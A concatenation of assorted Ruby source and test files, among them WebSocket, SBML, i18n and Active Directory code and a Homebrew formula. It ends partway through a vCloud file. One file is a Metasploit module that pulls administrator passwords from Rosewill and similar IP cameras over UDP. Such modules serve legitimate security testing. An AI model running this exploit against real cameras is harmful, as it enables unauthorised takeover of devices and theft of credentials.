expect(@t.eval('hist')).to match(/1:\shello\n2:\sworld/)
end
it "displays all history (including the current sesion) with `--all` switch" do
@hist.push('goodbye')
@hist.push('world')
output = @t.eval('hist --all')
expect(output).to match(/1:\s:athos\n2:\s:porthos\n3:\s:aramis\n/)
expect(output).to match(/4:\sgoodbye\n5:\sworld/)
end
it "should not display histignore words in history" do
Pry.config.history.histignore = [
"well",
"hello",
"beautiful",
/show*/,
"exit"
]
@hist.push("well")
@hist.push("hello")
@hist.push("beautiful")
@hist.push("why")
@hist.push("so")
@hist.push("serious?")
@hist.push("show-method")
@hist.push("exit")
output = @t.eval("hist")
expect(output).to match(/1:\swhy\n2:\sso\n3:\sserious\?\n/)
end
end
end
| 28.38009 | 145 | 0.602838 |
f7a4b473f8eaf28cc78916450152ecbe3ff430d4 | 1,138 | require_relative "../test_helper"
class I18nIntegrationTest < ActionDispatch::IntegrationTest
def collect_combined_keys(hash, ns = nil)
hash.collect do |k, v|
keys = []
keys << collect_combined_keys(v, "#{ns}.#{k}") if v.is_a?(Hash)
keys << "#{ns}.#{k}"
end.flatten
end
def test_translations
locales_path = File.expand_path("../../../config/locales", __FILE__)
locales = Dir.glob("#{locales_path}/*.yml").collect do |file_path|
File.basename(file_path, ".yml")
end
# collecting all locales
locale_keys = {}
locales.each do |locale|
translations = YAML.load_file("#{locales_path}/#{locale}.yml")
locale_keys[locale] = collect_combined_keys(translations[locale])
end
# Using en as reference
reference = locale_keys[locales.delete("en")]
assert reference.present?
locale_keys.each do |locale, keys|
missing = reference - keys
assert missing.blank?, "#{locale} locale is missing: #{missing.join(', ')}"
extra = keys - reference
assert extra.blank?, "#{locale} locale has extra: #{extra.join(', ')}"
end
end
end
| 29.179487 | 81 | 0.644112 |
f81be91217b7b2049619438cba48550f8752b781 | 1,226 | module Padrino
module WebSockets
module SpiderGazelle
module Routing
require 'spider-gazelle/upgrades/websocket'
##
# Creates a WebSocket endpoint using SpiderGazelle + libuv.
#
# It handles upgrading the HTTP connection for you.
# You can nest this inside controllers as you would do with regular actions in Padrino.
#
def websocket(channel, *args, &block)
get channel, *args do
# Let some other action try to handle the request if it's not a WebSocket.
throw :pass unless request.env['rack.hijack']
event_context = self
ws_channel = params[:channel] || channel
# It's a WebSocket. Get the libuv promise and manage its events
request.env['rack.hijack'].call.then do |hijacked|
ws = ::SpiderGazelle::Websocket.new hijacked.socket, hijacked.env
set_websocket_user
Padrino::WebSockets::SpiderGazelle::EventManager.new(
ws_channel, session['websocket_user'], ws, event_context, &block)
ws.start
end
end
end
alias :ws :websocket
end
end
end
end
| 32.263158 | 95 | 0.601142 |
21ce84e10f0c4652a1ec4d93d48d427652263093 | 14 | json.msg @msg
| 7 | 13 | 0.714286 |
798ea1f73827bb85f5d9b064f2fc5c9958ceb758 | 2,807 | RSpec.shared_examples_for 'all client drafts' do
def validate_request
expect(handshake.to_s).to eql(client_request)
handshake << server_response
expect(handshake.error).to be_nil
expect(handshake).to be_finished
expect(handshake).to be_valid
end
it 'is valid' do
handshake << server_response
expect(handshake.error).to be_nil
expect(handshake).to be_finished
expect(handshake).to be_valid
end
it 'returns valid version' do
expect(handshake.version).to eql(version)
end
it 'returns valid host' do
@request_params = { host: 'www.test.cc' }
expect(handshake.host).to eql('www.test.cc')
end
it 'returns valid path' do
@request_params = { path: '/custom' }
expect(handshake.path).to eql('/custom')
end
it 'returns valid query' do
@request_params = { query: 'aaa=bbb' }
expect(handshake.query).to eql('aaa=bbb')
end
it 'returns valid port' do
@request_params = { port: 123 }
expect(handshake.port).to be(123)
end
it 'returns valid headers' do
@request_params = { headers: { 'aaa' => 'bbb' } }
expect(handshake.headers).to eql('aaa' => 'bbb')
end
it 'parses uri' do
@request_params = { uri: 'ws://test.example.org:301/test_path?query=true' }
expect(handshake.host).to eql('test.example.org')
expect(handshake.port).to be(301)
expect(handshake.path).to eql('/test_path')
expect(handshake.query).to eql('query=true')
end
it 'parses url' do
@request_params = { url: 'ws://test.example.org:301/test_path?query=true' }
expect(handshake.host).to eql('test.example.org')
expect(handshake.port).to be(301)
expect(handshake.path).to eql('/test_path')
expect(handshake.query).to eql('query=true')
end
it 'resolves correct path with root server provided' do
@request_params = { url: 'ws://test.example.org' }
expect(handshake.path).to eql('/')
end
it 'returns valid response' do
validate_request
end
it 'allows custom path' do
@request_params = { path: '/custom' }
validate_request
end
it 'allows query in path' do
@request_params = { query: 'test=true' }
validate_request
end
it 'allows custom port' do
@request_params = { port: 123 }
validate_request
end
it 'allows custom headers' do
@request_params = { headers: { 'aaa' => 'bbb' } }
validate_request
end
it 'recognizes unfinished requests' do
handshake << server_response[0..-20]
expect(handshake).not_to be_finished
expect(handshake).not_to be_valid
end
it 'disallows requests with invalid request method' do
handshake << server_response.gsub('101', '404')
expect(handshake).to be_finished
expect(handshake).not_to be_valid
expect(handshake.error).to be(:invalid_status_code)
end
end
| 25.752294 | 79 | 0.676167 |
5de50d297c1f363738e815870f7d7d8e110cb5bb | 5,512 | # @file TestSBMLDocument.rb
# @brief SBMLDocument unit tests
#
# @author Akiya Jouraku (Ruby conversion)
# @author Ben Bornstein
#
#
# ====== WARNING ===== WARNING ===== WARNING ===== WARNING ===== WARNING ======
#
# DO NOT EDIT THIS FILE.
#
# This file was generated automatically by converting the file located at
# src/sbml/test/TestSBMLDocument.c
# using the conversion program dev/utilities/translateTests/translateTests.pl.
# Any changes made here will be lost the next time the file is regenerated.
#
# -----------------------------------------------------------------------------
# This file is part of libSBML. Please visit http://sbml.org for more
# information about SBML, and the latest version of libSBML.
#
# Copyright 2005-2010 California Institute of Technology.
# Copyright 2002-2005 California Institute of Technology and
# Japan Science and Technology Corporation.
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation. A copy of the license agreement is provided
# in the file named "LICENSE.txt" included with this software distribution
# and also available online as http://sbml.org/software/libsbml/license.html
# -----------------------------------------------------------------------------
require 'test/unit'
require 'libSBML'
class TestSBMLDocument < Test::Unit::TestCase
def test_SBMLDocument_create
d = LibSBML::SBMLDocument.new()
assert( d.getTypeCode() == LibSBML::SBML_DOCUMENT )
assert( d.getNotes() == nil )
assert( d.getAnnotation() == nil )
assert( d.getLevel() == 3 )
assert( d.getVersion() == 1 )
assert( d.getNumErrors() == 0 )
d = nil
end
def test_SBMLDocument_createWith
d = LibSBML::SBMLDocument.new(1,2)
assert( d.getTypeCode() == LibSBML::SBML_DOCUMENT )
assert( d.getNotes() == nil )
assert( d.getAnnotation() == nil )
assert( d.getLevel() == 1 )
assert( d.getVersion() == 2 )
assert( d.getNumErrors() == 0 )
d = nil
end
def test_SBMLDocument_free_NULL
end
def test_SBMLDocument_setLevelAndVersion
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,2)
d.setModel(m1)
assert( d.setLevelAndVersion(2,3,false) == true )
assert( d.setLevelAndVersion(2,1,false) == true )
assert( d.setLevelAndVersion(1,2,false) == true )
assert( d.setLevelAndVersion(1,1,false) == false )
d = nil
end
def test_SBMLDocument_setLevelAndVersion_Error
d = LibSBML::SBMLDocument.new()
d.setLevelAndVersion(2,1,true)
m1 = LibSBML::Model.new(2,1)
u = LibSBML::Unit.new(2,1)
u.setKind(LibSBML::UnitKind_forName("mole"))
u.setOffset(3.2)
ud = LibSBML::UnitDefinition.new(2,1)
ud.setId( "ud")
ud.addUnit(u)
m1.addUnitDefinition(ud)
d.setModel(m1)
assert( d.setLevelAndVersion(2,2,true) == false )
assert( d.setLevelAndVersion(2,3,true) == false )
assert( d.setLevelAndVersion(1,2,true) == false )
assert( d.setLevelAndVersion(1,1,true) == false )
d = nil
end
def test_SBMLDocument_setLevelAndVersion_UnitsError
d = LibSBML::SBMLDocument.new()
d.setLevelAndVersion(2,4,false)
m1 = d.createModel()
c = m1.createCompartment()
c.setId( "c")
p = m1.createParameter()
p.setId( "p")
p.setUnits( "mole")
r = m1.createAssignmentRule()
r.setVariable( "c")
r.setFormula( "p*p")
assert( d.setLevelAndVersion(2,2,false) == true )
assert( d.setLevelAndVersion(2,3,false) == true )
assert( d.setLevelAndVersion(1,2,false) == true )
assert( d.setLevelAndVersion(1,1,false) == false )
d = nil
end
def test_SBMLDocument_setLevelAndVersion_Warning
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,2)
(m1).setSBOTerm(2)
d.setModel(m1)
assert( d.setLevelAndVersion(2,3,false) == true )
assert( d.setLevelAndVersion(2,1,false) == true )
assert( d.setLevelAndVersion(1,2,false) == true )
assert( d.setLevelAndVersion(1,1,false) == false )
d = nil
end
def test_SBMLDocument_setModel
d = LibSBML::SBMLDocument.new(2,4)
m1 = LibSBML::Model.new(2,4)
m2 = LibSBML::Model.new(2,4)
assert( d.getModel() == nil )
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
assert( mout != nil )
assert( mout != m1 )
i = d.setModel(d.getModel())
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
assert( mout != nil )
assert( mout != m1 )
i = d.setModel(m2)
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
mout = d.getModel()
assert( mout != nil )
assert( mout != m2 )
d = nil
end
def test_SBMLDocument_setModel1
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,1)
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_VERSION_MISMATCH )
assert( d.getModel() == nil )
d = nil
end
def test_SBMLDocument_setModel2
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(1,2)
m1.createCompartment()
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_LEVEL_MISMATCH )
assert( d.getModel() == nil )
d = nil
end
def test_SBMLDocument_setModel3
d = LibSBML::SBMLDocument.new(2,2)
m1 = LibSBML::Model.new(2,2)
i = d.setModel(m1)
assert( i == LibSBML::LIBSBML_OPERATION_SUCCESS )
assert( d.getModel() != nil )
d = nil
end
end
| 31.678161 | 79 | 0.642598 |
1db5205051497860418ece1180debf2922bf6526 | 2,454 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require_relative '../legacy_spec_helper'
describe Status, type: :model do
fixtures :all
it 'should create' do
status = Status.new name: 'Assigned'
assert !status.save
# status name uniqueness
assert_equal 1, status.errors.count
status.name = 'Test Status'
assert status.save
assert !status.is_default
end
it 'should destroy' do
status = Status.find(3)
assert_difference 'Status.count', -1 do
assert status.destroy
end
assert_equal 0, Workflow.where(old_status_id: status.id).count
assert_equal 0, Workflow.where(new_status_id: status.id).count
end
it 'should destroy status in use' do
# Status assigned to an Issue
status = WorkPackage.find(1).status
assert_raises(RuntimeError, "Can't delete status") { status.destroy }
end
it 'should change default' do
status = Status.find(2)
assert !status.is_default
status.is_default = true
assert status.save
status.reload
assert_equal status, Status.default
assert !Status.find(1).is_default
end
it 'should reorder should not clear default status' do
status = Status.default
status.move_to_bottom
status.reload
assert status.is_default?
end
end
| 30.675 | 91 | 0.732681 |
034bfd2784482a68a6369fe285f959123d9717e8 | 585 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Projects::Security::ConfigurationHelper do
let(:current_user) { create(:user) }
describe 'security_upgrade_path' do
subject { security_upgrade_path }
it { is_expected.to eq("https://#{ApplicationHelper.promo_host}/pricing/") }
end
describe 'vulnerability_training_docs_path' do
subject { helper.vulnerability_training_docs_path }
it { is_expected.to eq(help_page_path('user/application_security/vulnerabilities/index', anchor: 'enable-security-training-for-vulnerabilities')) }
end
end
| 29.25 | 151 | 0.769231 |
b9edb0974630a19bf0574e86d01c4dcb5607a625 | 3,513 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Rosewill RXS-3211 IP Camera Password Retriever',
'Description' => %q{
This module takes advantage of a protocol design issue with the Rosewill admin
executable in order to retrieve passwords, allowing remote attackers to take
administrative control over the device. Other similar IP Cameras such as Edimax,
Hawking, Zonet, etc, are also believed to have the same flaw, but not fully tested.
The protocol deisgn issue also allows attackers to reset passwords on the device.
},
'Author' => 'Ben Schmidt',
'References' =>
[
[ 'URL', 'http://spareclockcycles.org/exploiting-an-ip-camera-control-protocol/' ],
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::CHOST,
Opt::RPORT(13364),
], self.class)
end
def run_host(ip)
#Protocol
target_mac = "\xff\xff\xff\xff\xff\xff"
cmd = "\x00" #Request
cmd << "\x06\xff\xf9" #Type
password = nil
begin
# Create an unbound UDP socket if no CHOST is specified, otherwise
# create a UDP socket bound to CHOST (in order to avail of pivoting)
udp_sock = Rex::Socket::Udp.create( {
'LocalHost' => datastore['CHOST'] || nil,
'PeerHost' => ip,
'PeerPort' => datastore['RPORT'],
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
})
udp_sock.put(target_mac+cmd)
res = udp_sock.recvfrom(65535, 0.5) and res[1]
#Parse the reply if we get a response
if res
password = parse_reply(res)
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
print_error("Connection error")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
udp_sock.close if udp_sock
end
#Store the password if the parser returns something
if password
print_status("Password retrieved: #{password.to_s}")
report_cred(
ip: rhost,
port: rport,
service_name: 'ipcam',
user: '',
password: password,
proof: password
)
end
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def parse_reply(pkt)
@results ||= {}
# Ignore "empty" packets
return nil if not pkt[1]
if(pkt[1] =~ /^::ffff:/)
pkt[1] = pkt[1].sub(/^::ffff:/, '')
end
return pkt[0][333,12] if pkt[0][6,4] == "\x01\x06\xff\xf9"
end
end
| 26.216418 | 96 | 0.603473 |
b934cea575f20631c62f5ff37ad0538e899b92ca | 235 | # encoding: utf-8
Refinery::I18n.configure do |config|
config.default_locale = :en
config.current_locale = :en
config.default_frontend_locale = :en
config.frontend_locales = [:en]
config.locales = {:en=>"English"}
end
| 16.785714 | 38 | 0.702128 |
6a66b38d486026c3842ba1e991743a0a72381aec | 152 | class CreateItems < ActiveRecord::Migration[6.1]
def change
create_table :items do |t|
t.string :name
t.timestamps
end
end
end
| 15.2 | 48 | 0.651316 |
1ce24fe85f51be69bb1671ad0aca3033a4577ee0 | 185 | namespace :db do
desc "Upload config/database.yml"
path = "config/database.yml"
task :upload do
on roles(:db) do
upload!(path, shared_path.join(path))
end
end
end
| 18.5 | 43 | 0.659459 |
26dd5260d59e6079e5799b51966d7def2786160e | 1,369 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require 'spec_helper'
describe 'client#ml.get_memory_stats' do
let(:expected_args) do
[
'GET',
url,
{},
nil,
{}
]
end
context 'without a node id' do
let(:url) { '_ml/memory/_stats' }
it 'performs the request' do
expect(client_double.ml.get_memory_stats).to be_a Elasticsearch::API::Response
end
end
context 'with a node id' do
let(:url) { '_ml/memory/foo/_stats' }
it 'performs the request' do
expect(client_double.ml.get_memory_stats(node_id: 'foo')).to be_a Elasticsearch::API::Response
end
end
end
| 28.520833 | 100 | 0.711468 |
0856e431377d4e601cbd466e24ea1aff0a8bd7a4 | 924 | require "rails_helper"
RSpec.describe Api::V1::UsersController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(get: "/api/v1/users").to route_to("api/v1/users#index", format: :json)
end
it "routes to #show" do
expect(get: "/api/v1/users/1").to route_to("api/v1/users#show", id: "1", format: :json)
end
it "routes to #create" do
expect(post: "/api/v1/users").to route_to("api/v1/users#create", format: :json)
end
it "routes to #update via PUT" do
expect(put: "/api/v1/users/1").to route_to("api/v1/users#update", id: "1", format: :json)
end
it "routes to #update via PATCH" do
expect(patch: "/api/v1/users/1").to route_to("api/v1/users#update", id: "1", format: :json)
end
it "routes to #destroy" do
expect(delete: "/api/v1/users/1").to route_to("api/v1/users#destroy", id: "1", format: :json)
end
end
end
| 30.8 | 99 | 0.623377 |
ab50d2f3730a7cb1283f4d69618ba5a3fbea0221 | 9,191 | # Add the dependencies file to require vendor libs
require File.expand_path(File.join(File.dirname(__FILE__), 'dependencies'))
class ActiveDirectoryComputerRemoveGroupsV1
# Prepare for execution by configuring the initial LDAP configuration,
# initializing Hash objects for necessary values, and validate the present
# state. This method sets the following instance variables:
# * @input_document - A REXML::Document object that represents the input XML.
# * @info_values - A Hash of task definition info item names to values.
# * @debug_logging_enabled - A Boolean value indicating whether logging should
# be enabled or disabled.
# * @parameters - A Hash of parameter names to parameter values.
# * @search_by - Determines the attribute to search for the computer.
# * @group_names - A list of groups to add to the computer.
#
# ==== Parameters
# * +input+ - The String of Xml that was built by evaluating the node.xml
# handler template.
def initialize(input)
# Construct an xml document to extract the parameters from the input string
@input_document = REXML::Document.new(input)
# Hash to hold the task info values
@info_values = {}
# Load the task info values
REXML::XPath.each(@input_document,"/handler/infos/info") { |item|
@info_values[item.attributes['name']] = item.text }
# Create the ldap object to interact with the active directory server
@ldap = Net::LDAP.new(
:host => @info_values['host'],
:port => @info_values['port'],
:auth => {
:method => :simple,
:username => @info_values['username'],
:password => @info_values['password']
}
)
# Determine if debug logging is enabled.
@debug_logging_enabled = @info_values['enable_debug_logging'] == 'Yes'
if @debug_logging_enabled
puts("Debug logging enabled...")
puts("Connecting to #{@info_values['host']}:#{@info_values['port']} as #{@info_values['username']}.")
puts("Using #{@info_values['base']} for the base of the directory tree.")
end
# Store parameters in the node.xml in a hash attribute named @parameters.
@parameters = {}
REXML::XPath.each(@input_document, '/handler/parameters/parameter') { |node|
@parameters[node.attributes['name']] = node.text
}
puts("Parameters: #{@parameters.inspect}") if @debug_logging_enabled
# First locate the computer entry and set the @search_by to the actual attribute name
# for the search filter
if @parameters['search_by'] == "Computer Name"
@search_by = 'cn'
else
raise "Unknown search attribute for computer: #{@parameters['search_by']}"
end
# Create an array of group names to add to the user by splitting the
# 'groups' parameter on any combination of spaces followed by a comma
# followed by any number of spaces.
@group_names = @parameters['groups'].split(%r{\s*,\s*})
end
# Searches for the user in the Active Directory server based on the search
# parameters starting with a filter for organizationalPerson, then adds the
# list of groups to the user
#
# This is a required method that is automatically called by the Kinetic Task
# Engine.
#
# ==== Returns
# An Xml formatted String representing the return variable results.
def execute()
# If we are successful in authenticating using the active directory
# server and credentials specified by the task info values.
if @ldap.bind
# Build a filter to search by
filter = Net::LDAP::Filter.eq( "objectclass", "computer" )
# Add the search value (attribute) to the filter for the search
unless @parameters['search_value'].nil?
filter = filter & Net::LDAP::Filter.eq(@search_by, @parameters['search_value'])
end
# Search operation - return result is set to true so that an array is
# returned (to determine if search matches more than one entry)
user_entries = @ldap.search(
:base => @info_values['base'],
:filter => filter,
:size => 2,
:return_result => true
)
# Raise an exception if there was a problem with the call
unless @ldap.get_operation_result.code == 0
raise @ldap.get_operation_result.message
end
# Raise exception if search did not return 1 entry
if user_entries.length < 1
raise "Computer not found when searching by #{@search_by} for: #{@parameters['search_value']}"
elsif user_entries.length > 1
raise "Search matched more than one entry when searching by #{@search_by} for: #{@parameters['search_value']}"
end
#puts "Computer entries: #{user_entries.length}"
# Determine the computers distinguished name
user_dn = user_entries.first.dn
#puts "Computer DN: #{user_dn}"
# For each of the group names
groups = @group_names.inject({}) do |hash, group_name|
# Initialize the group name
hash[group_name] = nil
# Build a filter to retrieve the group entries
filter = Net::LDAP::Filter.eq( "objectclass", "group" ) & Net::LDAP::Filter.eq( "cn", group_name )
# Search for each of the groups
@ldap.search(
:base => "#{@info_values['base']}",
:filter => filter,
:return_result => false
) {|entry| hash[group_name] = entry }
# Return the hash to be used with the remaining inject calls
hash
end
# If debug logging is enabled
if @debug_logging_enabled
# Log the retrieved group information
puts "Retrieved Groups:"
groups.each do |name, group|
puts " #{name}: #{group.dn}"
end
end
# Attempt to retrieve the names of any groups that did were not retrieved
missing_group_names = groups.keys.select {|name| groups[name].nil?}
# Determine if there were any missing groups
missing_groups = Hash[groups.select {|key, value| value.nil?}]
# If there was at least 1 missing group
if missing_groups.length > 0
# Raise an error
raise "Unable to locate the following groups: #{missing_groups.keys.join(', ')}"
end
# If debug logging is enabled
if @debug_logging_enabled
# Log the retrieved group information
puts "Retrieved Groups:"
groups.each do |name, group|
puts " #{name}: #{group.dn}"
end
end
# Initialize any errors that occurred
errors = {}
# For each of the groups
groups.each do |name, entry|
# Attempt to remove the user from the group
@ldap.modify(:dn => entry.dn, :operations => [[:delete, :member, [user_dn]]])
# Log the results
puts "Result for #{name}: #{@ldap.get_operation_result.message}" if @debug_logging_enabled
# Add an error for the group name if the query was not successful
unless @ldap.get_operation_result.code == 0
errors.merge!(name => @ldap.get_operation_result.error_message)
end
end
# If there were any errors
if errors.length > 0
# Initialize the error message string
error_string = "There were problems removing the computer with a " <<
"#{@parameters['search_by']} of #{@parameters['search_value']} from " <<
"the following groups: #{errors.keys.join(', ')}"
# Add a specific error message for each of the failed groups
errors.each do |group_name, error|
error_string << "\n #{groups[group_name].dn}: #{error.to_s.inspect}"
end
# Add in a list of groups successfully removed
error_string << "\n The following groups were successfully removed: " <<
"#{(@group_names - errors.keys).join(', ')}"
# Raise the exception
raise error_string
end
# If authentication of the ldap session failed
else
# Raise an error
raise "Directory authentication failed for #{@info_values['host']}: #{@ldap.get_operation_result}"
end
# Build, log, and return the results
results = '<results/>'
puts("Results: \n#{results}") if @debug_logging_enabled
return results
end
##############################################################################
# General handler utility functions
##############################################################################
# This is a template method that is used to escape results values (returned in
# execute) that would cause the XML to be invalid. This method is not
# necessary if values do not contain character that have special meaning in
# XML (&, ", <, and >), however it is a good practice to use it for all return
# variable results in case the value could include one of those characters in
# the future. This method can be copied and reused between handlers.
def escape(string)
# Globally replace characters based on the ESCAPE_CHARACTERS constant
string.to_s.gsub(/[&"><]/) { |special| ESCAPE_CHARACTERS[special] } if string
end
# This is a ruby constant that is used by the escape method
ESCAPE_CHARACTERS = {'&'=>'&', '>'=>'>', '<'=>'<', '"' => '"'}
end | 41.03125 | 118 | 0.64215 |
5d6cb227030c3e260e284305255f9bfd5429f867 | 2,296 | require "language/haskell"
class Elm < Formula
include Language::Haskell::Cabal
desc "Functional programming language for building browser-based GUIs"
homepage "https://elm-lang.org"
url "https://github.com/elm/compiler/archive/0.19.1.tar.gz"
sha256 "aa161caca775cef1bbb04bcdeb4471d3aabcf87b6d9d9d5b0d62d3052e8250b1"
bottle do
sha256 "e1bbfe4ff7deba3ed60eb55b81b86b6d3346325bea584802ca1212369f0fa0bb" => :catalina
sha256 "288eeb47caccfaa9bae220492cee8de7206d40b7760e1e309a139a2398f9710d" => :mojave
sha256 "7fb65ff925701c39bbc7d9a5099cd88f10a56949ae019bc8817035ed1d56edbd" => :high_sierra
sha256 "1e9cbf0cacc21654787824f241af953966ff9f6df2d8218413962ded9bbfa139" => :x86_64_linux
end
depends_on "cabal-install" => :build
depends_on "[email protected]" => :build
uses_from_macos "ncurses"
uses_from_macos "zlib"
def install
# elm-compiler needs to be staged in a subdirectory for the build process to succeed
(buildpath/"elm-compiler").install Dir["*"]
cabal_sandbox do
cabal_sandbox_add_source "elm-compiler"
cabal_install "--only-dependencies", "--force-reinstalls", "elm"
cabal_install "--prefix=#{prefix}", "elm"
end
end
test do
# create elm.json
elm_json_path = testpath/"elm.json"
elm_json_path.write <<~EOS
{
"type": "application",
"source-directories": [
"."
],
"elm-version": "0.19.1",
"dependencies": {
"direct": {
"elm/browser": "1.0.0",
"elm/core": "1.0.0",
"elm/html": "1.0.0"
},
"indirect": {
"elm/json": "1.0.0",
"elm/time": "1.0.0",
"elm/url": "1.0.0",
"elm/virtual-dom": "1.0.0"
}
},
"test-dependencies": {
"direct": {},
"indirect": {}
}
}
EOS
src_path = testpath/"Hello.elm"
src_path.write <<~EOS
module Hello exposing (main)
import Html exposing (text)
main = text "Hello, world!"
EOS
out_path = testpath/"index.html"
system bin/"elm", "make", src_path, "--output=#{out_path}"
assert_predicate out_path, :exist?
end
end
| 29.818182 | 94 | 0.597125 |
1c554d255b0066200fca5362b4df3bc33b69cf11 | 370 | # frozen_string_literal: true
require 'rails_helper'
describe PublishChannel do
subject { described_class.new(uri) }
context "with a vocab term" do
let(:uri) { AICPublishChannel.TrustedParty }
its(:uri) { is_expected.to eq("http://definitions.artic.edu/publish_channel/TrustedParty") }
its(:pref_label) { is_expected.to eq("Trusted Party") }
end
end
| 28.461538 | 96 | 0.732432 |
61d7c7ecced53ca3841205d9cef61aef6893e7be | 3,034 | require File.expand_path('../boot', __FILE__)
require 'csv'
require 'rails/all'
if defined?(Bundler)
# If you precompile assets before deploying to production, use this line
Bundler.require(*Rails.groups(:assets => %w(development test)))
# If you want your assets lazily compiled in production, use this line
# Bundler.require(:default, :assets, Rails.env)
end
module VeritasWeb
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
config.autoload_paths += %W(#{config.root}/lib)
config.autoload_paths += %W(#{config.root}/app/models/ckeditor)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
# Enable escaping HTML in JSON.
config.active_support.escape_html_entities_in_json = true
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Enforce whitelist mode for mass assignment.
# This will create an empty whitelist of attributes available for mass-assignment for all models
# in your app. As such, your models will need to explicitly whitelist or blacklist accessible
# parameters by using an attr_accessible or attr_protected declaration.
config.active_record.whitelist_attributes = true
# Enable the asset pipeline
config.assets.enabled = true
config.assets.initialize_on_precompile = false
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
config.carrier_lookup_api_url = 'http://www.carrierlookup.com/index.php/api/lookup?'
end
end
| 43.971014 | 100 | 0.735662 |
e8070b83409369b320c916752f5ce78e06af14af | 184 | FactoryGirl.define do
factory :fide_rating do
association :fide_player
rating { 1 + rand(2500) }
list "2011-11-01"
games { rand(30) }
end
end
| 20.444444 | 35 | 0.570652 |
2604a85b96bd5ee8bb4907d67400f413bb215b5f | 892 | module Hippo_eyeDoc::TransactionSets
module HIPAA_999
class L2110AK2 < Hippo_eyeDoc::TransactionSets::Base
loop_name 'L2110AK2' #Implementation Data Element Note
#Implementation Data Element Note
segment Hippo_eyeDoc::Segments::IK4,
:name => 'Implementation Data Element Note',
:minimum => 0,
:maximum => 1,
:position => 600,
:identified_by => {
'IK403' => ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "12", "13", "I10", "I11", "I12", "I13", "I6", "I9"]
}
#Element Context
segment Hippo_eyeDoc::Segments::CTX,
:name => 'Element Context',
:minimum => 0,
:maximum => 10,
:position => 700
end
end
end
| 33.037037 | 132 | 0.454036 |
ffef1f9f51611400f37559c59378a288a9edc857 | 1,237 | module VCloudCloud
module Steps
class ReconfigureVM < Step
def perform(name, description, resource_pool, networks, &block)
vapp = state[:vapp] = client.reload state[:vapp]
vm = state[:vm] = client.reload state[:vm]
vm.name = name unless name.nil?
vm.description = description unless description.nil?
